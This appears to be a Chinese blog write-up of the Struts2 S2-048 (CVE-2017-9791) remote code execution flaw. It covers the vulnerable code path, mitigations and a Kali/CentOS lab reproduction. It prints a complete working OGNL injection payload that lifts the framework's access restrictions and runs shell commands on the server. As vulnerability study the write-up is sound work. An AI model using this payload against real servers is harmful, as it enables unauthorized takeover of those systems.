Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP

一、漏洞分析

1.漏洞背景:

1)官方说明:

It is possible to perform a RCE attack with amalicious field value when using the Struts 2 Struts 1 plugin and it's a Struts1 action and the value is a part of a message presented to the user, i.e. whenusing untrusted input as a part of the error message in the ActionMessageclass.

2)详见:https://cwiki.apache.org/confluence/display/WW/S2-048,这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是将struts1的action封装成struts2的action以便在strut2上使用。

3)主要受影响的Struts版本为:2.3.x

4)攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。

2.漏洞原因

1)showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java下,“Struts1.gangsterAdded”被引入:

2)showcase/src/main/resources/globalMessages.properties下“Struts1.gangsterAdded”被定义:

Struts1.gangsterAdded是一个关键值,一旦“Gangster{0} added successfully”,它将绕开执行OGNL代码。

3)这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是将struts1的action封装成struts2的action以便在strut2上使用。本质问题出在struts2-struts1-plugin包Struts1Action.java文件中,Struts1Action类中的execute方法调用了getText函数,这个函数会执行ognl表达式,更为严重的是getText的输入内容是攻击者可控的。

4)输入参数之后,执行Struts1ction的execute方法。

5)调用saveGangsterAction的excute方法,将表单中地内容封装到actionforward,这个方法中就带入有毒参数gforn.getName()放到了messages结构中,gform.getName()的值是从客户端获取的。

6)攻击者将用户可控地值添加到ActionMessage并在客户前端展示,导致其进入getText函数,最后messageb被当作ognl表达式执行。以下两部分代码事位于integration app下的SaveGangsterAction.java部分源码:

3.漏洞总结:

1)通过运行struts1Acion.java的execute方法,获取Action。

2)调用saveGangsterAction的execute方法,这部分代码就是漏洞代码,这里创建了一个action message变量,将表单请求封装到actionForm中。代码详见图2.6)

3)设置标识,获取ActionMessage。

4)回到Struts1Action.java,跟着代码流,我们能看到控制流到达getText方法在TextProviderSupport.java:

红框所示的是在LocalizeTextUtil.Java中FindText的方法。这种方法负责找到本地message给key,它也能解析OGNL表达式。这个key就是aTextName,正如漏洞原因中提到的。

5)如果这种方法在提供地key中没有找到message,它就会调用getDefaultMessage地方法:


6)translateVariables方法从OgnlTextPrasrt.java中调用parser.evaluate方法,Parser.evaluate函数事负责从message段中解析OGNL表达式的,它检查在message中的”${“或者”%{”字符串,创建var变量并且求它的值。这里就不截图了。

7)在Apache Struts中,大部分OGNL注入漏洞都被爆出来了。攻击者能够利用这些漏洞很容易就执行命令,因为OGNL注入漏洞比起其他攻击更简单。

8)漏洞防护:1)停用Struts2-struts1-plugin插件、showcase.war;2)讲直接传递原始值改为使用资源键:


二、宿主环境及攻击环境

这里,我开了两个虚拟机,kali做攻击机,Centos做靶机,以模拟RCE。

1.靶机:centOS 7.3:

2.攻击机:kali linux


三、EXP实现

1.搭建漏洞环境

1)下载漏洞环境包:http://archive.apache.org/dist/struts/2.3.24/struts-2.3.24-apps.zip

2)下载Tomcat:http://tomcat.apache.org/tomcat-7.0-doc/index.html

3)在Centos解压Tomcat包(这里我解压到用户目录下)

4)将下载好的漏洞环境包解压,将struts2-showcase.war,将移至解压后的Tomcat目录下的webapps下

5)开启Tomcat,执行命令:

2.本地验证漏洞

1)在终端打开Tomcat之后,在浏览器查看:127.0.0.1:8080,下图表示tomcat搭建成功:

2)访问漏洞环境:(如果无法访问,重启Tomcat将自动部署漏洞war包)

http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action

3)验证漏洞环境

    i.输入表达式

    ii.Submit之后可看到运算被后台执行:

3.模拟RCE(远程代码执行)(确保Tomcat打开)

1)Centos开启httpd、iptables、关闭防火墙、设置虚拟机NAT地址和端口。详见:http://blog.csdn.net/microsoft2014/article/details/57413491

http://linux.it.net.cn/CentOS/fast/2015/0110/11567.html

2)确认Centos的IP:

3)Kali访问Centos,执行OGNL语句:

4)访问:http://192.168.152.136:8080/struts2-showcase/integration/saveGangster.action

5)Submit后:


4.POC使用

1)声明文件上传:

%{(#szgx='multipart/form-data')

2)注入OGNL代码,通过ognl表达式静态调用获取ognl.OgnlContext的DEFAULT_MEMBER_ACCESS属性,并将获取地结果覆盖_memberAccess属性,绕过SecurityMemberAccess限制:

(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm))))

3)判断服务器系统,调用cmd或bash:

(#cmd='echo dota').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}

四、其他

1.复现过程中出现的问题及解决办法

1)Tomcat安装的时候,一开始安装我装的事7.0.8x版本,在浏览器上进不了tomcat,后来使用低版本的,成功解决这个问题。

2)关闭、重置Centos防火墙的时候在终端下输入命令可能会出现一些问题,这些问题一般是因为没有安装一些软件如:iptables、httpd等,解决方法已在上述说明。

3)模拟远端登录的时候,一定要注意攻击机输入地IP为Centos服务器地址+端口号。


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 201,552评论 5 474
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,666评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,519评论 0 334
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,180评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,205评论 5 363
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,344评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,781评论 3 393
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,449评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,635评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,467评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,515评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,217评论 3 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,775评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,851评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,084评论 1 258
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,637评论 2 348
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,204评论 2 341

推荐阅读更多精彩内容

  • Struts2框架 Struts由来 Struts最早是作为ApacheJakarta项目的组成部分,项目的创立者...
    whilewrongDebug阅读 1,553评论 0 0
  • 概述 什么是Struts2的框架Struts2是Struts1的下一代产品,是在 struts1和WebWork的...
    inke阅读 2,234评论 0 50
  • 时间都去哪了?不知不觉2017年就要过去四分之一,你还记得新年第一天自己写下的豪言壮语吗?还记得自己有多少需要完成...
    拉小姐阅读 318评论 0 0
  • 本书通过精美的图片和活泼的文字,描绘了动物眼睛的颜色、大小和所看到的景象等,向孩子们讲述了动物眼睛的作用和在动物的...
    潮尚宝贝儿阅读 2,496评论 0 0
  • 替一个朋友来教小孩子。在我看来,10岁真的不算小。这么形容比较符合他们的言行吧。 其中有几个眉眼如画的女孩,一路嘻...
    柒萬阅读 129评论 0 0